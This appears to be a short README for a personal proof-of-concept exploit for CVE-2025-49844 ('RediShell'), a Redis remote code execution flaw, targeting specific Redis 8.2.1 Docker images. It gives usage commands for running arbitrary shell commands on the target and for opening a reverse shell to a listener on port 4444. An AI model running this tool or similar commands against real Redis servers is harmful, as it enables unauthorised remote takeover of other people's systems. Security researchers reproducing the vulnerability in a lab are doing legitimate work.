My personal proof-of-concept for CVE-2025-49844, also known as RediShell.
Supported target builds:
- x86-64 Linux
redis:8.2.1-alpineDocker image - x86-64 Linux
redis:8.2.1-bookwormDocker image
It's a bit clumsy, probably not as good as Wiz Research's. Still, I'm glad I managed to get it working before the Hexacon 2025 talks are uploaded, and I had a great time investigating it.
Run one-way shell commands:
$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"Connect to a reverse shell:
$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444